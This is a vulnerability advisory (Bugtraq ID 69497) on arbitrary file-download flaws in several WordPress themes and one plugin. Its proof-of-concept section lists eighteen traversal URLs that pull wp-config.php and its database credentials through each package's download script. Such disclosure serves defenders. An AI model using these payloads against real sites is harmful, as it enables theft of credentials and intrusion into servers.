Multiple WordPress Themes Multiple Arbitrary File Download Vulnerabilities
BID:69497
Info
| Bugtraq ID: | 69497 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 01 2014 12:00AM |
| Updated: | Jan 06 2015 12:03AM |
| Credit: | Hugo Santiago |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple WordPress themes, along with at least one plugin, are prone to arbitrary file-download vulnerabilities. Each affected package ships a download script that passes a user-supplied file name (typically a 'file', 'download', 'img' or similar query parameter) to the file system without validating or confining it, so directory-traversal sequences such as '../' and absolute paths are honoured.
A remote attacker can exploit these issues to download arbitrary files readable by the web server account, including wp-config.php with its database credentials, and obtain potentially sensitive information.
Exploit / POC
Attackers can exploit these issues with a standard web browser: each request below is a plain GET in which the file parameter carries a traversal sequence or path pointing at wp-config.php.
The following example URIs are available:
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
http://www.example.com/wp-content/force-download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
http://www.example.com/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/markant/download.php?file=../../wp-config.php
http://www.example.com/wp-content/themes/yakimabait/download.php?file=./wp-config.php
http://www.example.com/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
http://www.example.com/wp-content/themes/felis/download.php?file=../wp-config.php
http://www.example.com/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
http://www.example.com/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/epic/includes/download.php?file=wp-config.php
http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
http://www.example.com/wp-content/themes/lote27/download.php?download=../../../wp-config.php
http://www.example.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
http://www.example.com/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References: